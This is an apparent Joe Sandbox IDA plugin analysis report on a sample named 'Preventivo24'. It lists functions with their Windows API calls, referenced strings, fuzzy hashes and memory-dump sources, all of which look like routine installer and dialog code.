Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 857462347baf5492925095b44826090e9f7efe84cd3aea91f37a402a2ade2306
Instruction ID: 168e83febbfe4df9c4da2713078aa808d24c17d6a93548b83e7a60f8ccc14d9c
Opcode Fuzzy Hash: 857462347baf5492925095b44826090e9f7efe84cd3aea91f37a402a2ade2306
Instruction Fuzzy Hash: 1A2160B1900348DFDB01CF58C94478ABBF4FB5A318F21829ED414AB391D7B69A06CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00A1CDD0 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33519dcb5cc6c77c355840fcbe306a70d6a7c13b9ca4ef5c97053e2766e3cbe5
Instruction ID: a853eaf97a5a09cb2331d910a31ce39e9a8f148e23769cd283e1e662b994b96e
Opcode Fuzzy Hash: 33519dcb5cc6c77c355840fcbe306a70d6a7c13b9ca4ef5c97053e2766e3cbe5
Instruction Fuzzy Hash: E3119BB1905348DFDB50CF58D544749BBF4FB09728F2082AEE8189B781D3769A06DF94

Uniqueness

Uniqueness Score: -1.00%

Function 00C04796 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1acb3b0b8d04db93cd5f42bd9a13636c22fc982ae24d62763b725473dc53297
Instruction ID: 472bdf5a074f8400877f9d308f7d50161eddff1cb156db38510ca8d8f697984f
Opcode Fuzzy Hash: e1acb3b0b8d04db93cd5f42bd9a13636c22fc982ae24d62763b725473dc53297
Instruction Fuzzy Hash: 3CF03072651224EFCB2ADB4CD405A5A73F8EB46B65F1141A6F605D7291D7B0DE00C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 00C047DA Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84adcf6e336c4bae0f721f8d2f7d32daac37cdaf3c253ded2eee1c659e4a4c20
Instruction ID: cbed4ff258abec614dc13307b434093d2d5f7548d905d508a4109f73738fe08c
Opcode Fuzzy Hash: 84adcf6e336c4bae0f721f8d2f7d32daac37cdaf3c253ded2eee1c659e4a4c20
Instruction Fuzzy Hash: 3BE08CB2921268EBCB18DBCCC90498BF3ECEB44B01B114596BA01E3180D270DE00D7D0

Uniqueness

Uniqueness Score: -1.00%

Function 00B271F0 Relevance: 31.8, APIs: 12, Strings: 6, Instructions: 293libraryloaderthreadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00D33180,26FBC52C,?), ref: 00B27263
EnterCriticalSection.KERNEL32(00D33180,26FBC52C), ref: 00B27278
GetCurrentProcess.KERNEL32 ref: 00B27285
GetCurrentThread.KERNEL32 ref: 00B27293
SymSetOptions.IMAGEHLP(80000016), ref: 00B272C1
LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr,00000000), ref: 00B27338
GetProcAddress.KERNEL32(00000000), ref: 00B2733F
SymInitialize.IMAGEHLP(00000000,00000000,00000001,00CA2730,00000000), ref: 00B27385
StackWalk.IMAGEHLP(0000014C,?,00000000,?,?,00000000,00000000,*** Stack Trace (x86) ***,0000001F,?,?,?,00000000), ref: 00B274C1
GetModuleHandleW.KERNEL32(00000000,*** Stack Trace (x86) ***,0000001F,?,?,?,00000000), ref: 00B2757A
SymCleanup.IMAGEHLP(00000000,00000000), ref: 00B27693
LeaveCriticalSection.KERNEL32(00D33180,?,00000000), ref: 00B276BE

Strings

Dbghelp.dll, xrefs: 00B27333
MODULE_BASE_ADDRESS, xrefs: 00B275C7
SymFromAddr, xrefs: 00B2732E
[0x%.8Ix] , xrefs: 00B27581
*** Stack Trace (x86) ***, xrefs: 00B27457
<--------------------MORE--FRAMES-------------------->, xrefs: 00B2751D

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: CriticalSection$CurrentInitialize$AddressCleanupEnterHandleLeaveLibraryLoadModuleOptionsProcProcessStackThreadWalk
String ID: *** Stack Trace (x86) ***$<--------------------MORE--FRAMES-------------------->$Dbghelp.dll$MODULE_BASE_ADDRESS$SymFromAddr$[0x%.8Ix]
API String ID: 4282195395-80696534
Opcode ID: 9fe72f6ce31aebbdd5664d2d3b6f1896c7a6ff466e6f29c62e2bae1405d319ba
Instruction ID: 16e59b23580092167d8d63eaa2971fa40cfca02fc60a0a26fb32341951eb1eda
Opcode Fuzzy Hash: 9fe72f6ce31aebbdd5664d2d3b6f1896c7a6ff466e6f29c62e2bae1405d319ba
Instruction Fuzzy Hash: 9DD1A8708446A89FDB21DF64DC89BEEBBB4AF04305F1002DAE40DA72A1DB756B84CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00B299B0 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 248COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(00000007,000001F6), ref: 00B299F8
GetDlgItem.USER32(00000007,000001F8), ref: 00B29A08
GetDlgItem.USER32(00000007,000001F7), ref: 00B29A4E
SetWindowTextW.USER32(00000000,?), ref: 00B29A61
ShowWindow.USER32(00000000,00000005), ref: 00B29ABF
GetDlgItem.USER32(00000007,000001F7), ref: 00B29AE5
SetWindowTextW.USER32(00000000,?), ref: 00B29AF8
ShowWindow.USER32(00000000,00000000), ref: 00B29B55
ShowWindow.USER32(?,00000000), ref: 00B29B60
SetWindowPos.USER32(00000007,00000000,00000000,00000000,?,?,00000616), ref: 00B29BAD
GetDlgItem.USER32(?,000000FF), ref: 00B29BE0
IsWindow.USER32(00000000), ref: 00B29BEA
SetWindowPos.USER32(000000FF,00000000,?,?,?,?,00000014,?,000000FF,?,?,00000616), ref: 00B29C37

Strings

Details >>, xrefs: 00B29ACC
Details <<, xrefs: 00B29A35

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Window$Item$Show$Text
String ID: Details <<$Details >>
API String ID: 2476474966-3763984547
Opcode ID: e9bf7881d7874f68f88b19cdcfd88895ce128e80b4630b1c12777b971710f05a
Instruction ID: 49898926ee7424ff75954e65992048b0c698792f12e4f8ef0a76811044c44191
Opcode Fuzzy Hash: e9bf7881d7874f68f88b19cdcfd88895ce128e80b4630b1c12777b971710f05a
Instruction Fuzzy Hash: 1191BFB1900305ABDB24DF68EC49BAEB7F5EF44700F20865DF40AE7290DB70A840CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00A225F0 Relevance: 21.4, APIs: 4, Strings: 8, Instructions: 372libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00000043), ref: 00A22718
GetProcAddress.KERNEL32(00000000,InitializeEmbeddedUI), ref: 00A2272A
GetProcAddress.KERNEL32(00000000,ShutdownEmbeddedUI), ref: 00A22738
GetProcAddress.KERNEL32(00000000,EmbeddedUIHandler), ref: 00A22747

Part of subcall function 009EB070: RtlAllocateHeap.NTDLL(?,00000000,?,26FBC52C,00000000,00C11B00,000000FF,?,?,00D25D3C,?,00000000,00B69FAB,8000000B,26FBC52C), ref: 009EB0BA

Part of subcall function 009EB400: GetProcessHeap.KERNEL32 ref: 009EB455

Strings

21.3.1, xrefs: 00A2283A
InitializeEmbeddedUI, xrefs: 00A22724
build , xrefs: 00A2284F
EmbeddedUIHandler, xrefs: 00A2273E
SELECT `Data` FROM `Binary` WHERE `Name` = 'InstallerAnalytics.dll', xrefs: 00A22679
69aaef70, xrefs: 00A2285E
INAN, xrefs: 00A22625
ShutdownEmbeddedUI, xrefs: 00A22730

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: AddressProc$Heap$AllocateLibraryLoadProcess
String ID: build $21.3.1$69aaef70$EmbeddedUIHandler$INAN$InitializeEmbeddedUI$SELECT `Data` FROM `Binary` WHERE `Name` = 'InstallerAnalytics.dll'$ShutdownEmbeddedUI
API String ID: 230625546-1630969157
Opcode ID: 8e18fe78967ff93c23442baf75704d3039a70d44e7987c4333e10a3d81930e44
Instruction ID: 95e5ceea8a2652862c26910b5391ead32cf8955380ebcd4a8b971de820db7d48
Opcode Fuzzy Hash: 8e18fe78967ff93c23442baf75704d3039a70d44e7987c4333e10a3d81930e44
Instruction Fuzzy Hash: 49D1F171D0021EEBCB05DF68DC55BAEBBB5FF48314F144229E815A7391EB34AA05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 009F1280 Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 282libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(combase.dll,RoGetActivationFactory,26FBC52C,00000000,?,?,?,?,?,?,?,?,?,?,?,26FBC52C), ref: 009F1303
GetProcAddress.KERNEL32(00000000,combase.dll), ref: 009F1309
LoadLibraryW.KERNEL32(?,.dll,-00000001,00000000,00CA2730,00000000,00000000,00000000), ref: 009F14CB

Strings

combase.dll, xrefs: 009F12FE, 009F13AF
CoIncrementMTAUsage, xrefs: 009F13AA
DllGetActivationFactory, xrefs: 009F150E
.dll, xrefs: 009F14B2
RoGetActivationFactory, xrefs: 009F12F9

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: LibraryLoad$AddressProc
String ID: .dll$CoIncrementMTAUsage$DllGetActivationFactory$RoGetActivationFactory$combase.dll
API String ID: 1469910268-2454113998
Opcode ID: 6c863cd419cd357042b91f50e798828e7a74c1ec089a3311379541e3ba03fa1e
Instruction ID: caf392f051ac4c6cace1c4cae23f7d961772159051bef83047c4556d9185e918
Opcode Fuzzy Hash: 6c863cd419cd357042b91f50e798828e7a74c1ec089a3311379541e3ba03fa1e
Instruction Fuzzy Hash: 11B19A71D0021DEFCB25DFA8D844BBEBBB8EF98310F148169E901A72A0DB749D44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B268A0 Relevance: 19.5, APIs: 2, Strings: 9, Instructions: 213COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,26FBC52C,?), ref: 00B26937
SymSetSearchPath.IMAGEHLP(26FBC52C,?,26FBC52C,?), ref: 00B26B98

Strings

Dbghelp.dll, xrefs: 00B27333
%hs(), xrefs: 00B2706A
MODULE_BASE_ADDRESS, xrefs: 00B275C7
SymFromAddr, xrefs: 00B2732E
[0x%.8Ix] , xrefs: 00B27581
-> , xrefs: 00B2717C
*** Stack Trace (x86) ***, xrefs: 00B27457
%hs:%ld, xrefs: 00B26E34
<--------------------MORE--FRAMES-------------------->, xrefs: 00B2751D

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: FileModuleNamePathSearch
String ID: *** Stack Trace (x86) ***$ -> $%hs()$%hs:%ld$<--------------------MORE--FRAMES-------------------->$Dbghelp.dll$MODULE_BASE_ADDRESS$SymFromAddr$[0x%.8Ix]
API String ID: 1980563475-1582651777
Opcode ID: 2cdc99dc2c5363b0461b4669135015aa8f6cc3b322bd4825bb880eb8e1413f84
Instruction ID: 6f48fffae89cdf35aba979013e2cbab9202a6faabfb22fe44fb153043a7930f6
Opcode Fuzzy Hash: 2cdc99dc2c5363b0461b4669135015aa8f6cc3b322bd4825bb880eb8e1413f84
Instruction Fuzzy Hash: 6F916771D005688BCB29DB24DC45BEDBBB4EB4A314F1082E9E56DA6291DB346EC48F81

Uniqueness

Uniqueness Score: -1.00%

Function 00B29690 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 128windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B20CA0: LoadLibraryW.KERNEL32(ComCtl32.dll,26FBC52C,00000000,00000000,?), ref: 00B20CDA
Part of subcall function 00B20CA0: GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 00B20D00
Part of subcall function 00B20CA0: FreeLibrary.KERNEL32(00000000), ref: 00B20D89

GetDlgItem.USER32(?,000001F4), ref: 00B296CB
SendMessageW.USER32(00000000,00000170,00000000,00000000), ref: 00B296DA
MulDiv.KERNEL32(00000009,00000000), ref: 00B296F6
GetDlgItem.USER32(?,000001F6), ref: 00B29730
IsWindow.USER32(00000000), ref: 00B29739
SendMessageW.USER32(00000000,00000030,?,00000000), ref: 00B29750
GetDlgItem.USER32(?,000001F8), ref: 00B2975E
GetWindowRect.USER32(?,?), ref: 00B2976D
GetWindowRect.USER32(00000000,?), ref: 00B29781
GetWindowRect.USER32(00000000,?), ref: 00B29795

Strings

Courier New, xrefs: 00B296FC

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Window$ItemRect$LibraryMessageSend$AddressFreeLoadProc
String ID: Courier New
API String ID: 1717253393-2572734833
Opcode ID: f5d70be25710ad0cc78f27e7f673e5aa14beb541d92c43e12e517ce1eb3ff3d1
Instruction ID: 1929d6a6bfe49622e8d4693548155eba4ba004a2379a0e22706a697ba638ab12
Opcode Fuzzy Hash: f5d70be25710ad0cc78f27e7f673e5aa14beb541d92c43e12e517ce1eb3ff3d1
Instruction Fuzzy Hash: 95416671780301BFE7545F24DC5AFAA37A5EF48B05F100668FB09EE2D2DEB1A8448B58

Uniqueness

Uniqueness Score: -1.00%

Function 00B2C6B0 Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 441libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,?,?,?,?,00000000), ref: 00B2C816
GetProcAddress.KERNEL32(00000000), ref: 00B2C81D
GetCurrentProcess.KERNEL32(?,00000000,?,?,?,00000000), ref: 00B2C857

Strings

Wrong OS or Os language for:, xrefs: 00B2CC0F
IsWow64Process2, xrefs: 00B2C80C
Search result:, xrefs: 00B2CAF9
Searching for:, xrefs: 00B2C959
Undefined, xrefs: 00B2CB64
No acceptable version found. It is already downloaded and it will be installed., xrefs: 00B2CB7F, 00B2CB80
kernel32, xrefs: 00B2C811

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: AddressCurrentHandleModuleProcProcess
String ID: IsWow64Process2$No acceptable version found. It is already downloaded and it will be installed.$Search result:$Searching for:$Undefined$Wrong OS or Os language for:$kernel32
API String ID: 4190356694-1896005707
Opcode ID: 78c7b33309687015abbd94d01a15d0018369d76f4105e05e9d62371fa93bf61e
Instruction ID: 2ed36c56a314973941c2353f63e8bbd7b64622e347d6e0ea96ec3e4531607a3f
Opcode Fuzzy Hash: 78c7b33309687015abbd94d01a15d0018369d76f4105e05e9d62371fa93bf61e
Instruction Fuzzy Hash: 4202A070900619DFDB14DFA8D984BAEBBF1FF44314F148299E41AAB290DB71AD46CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00A1C270 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 231windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(00000000,tooltips_class32,00000000,80000063,80000000,80000000,80000000,80000000,?,00000000,00000000,26FBC52C), ref: 00A1C2F8

Part of subcall function 009FA370: SetWindowLongW.USER32(?,000000FC,00000000), ref: 009FA3B2

SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00A1C403
SendMessageW.USER32(00000000,00000439,00000000,0000002C), ref: 00A1C417
SendMessageW.USER32(00000000,00000421,00000003,?), ref: 00A1C42C
SendMessageW.USER32(00000000,00000418,00000000,0000012C), ref: 00A1C441
SendMessageW.USER32(?,000000D6,-00000001,00000000), ref: 00A1C458
GetWindowRect.USER32(?,?), ref: 00A1C48A
SendMessageW.USER32(00000000,00000412,00000000), ref: 00A1C4E6
SendMessageW.USER32(00000000,00000411,00000001,0000002C), ref: 00A1C4FA

Strings

tooltips_class32, xrefs: 00A1C2F2

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
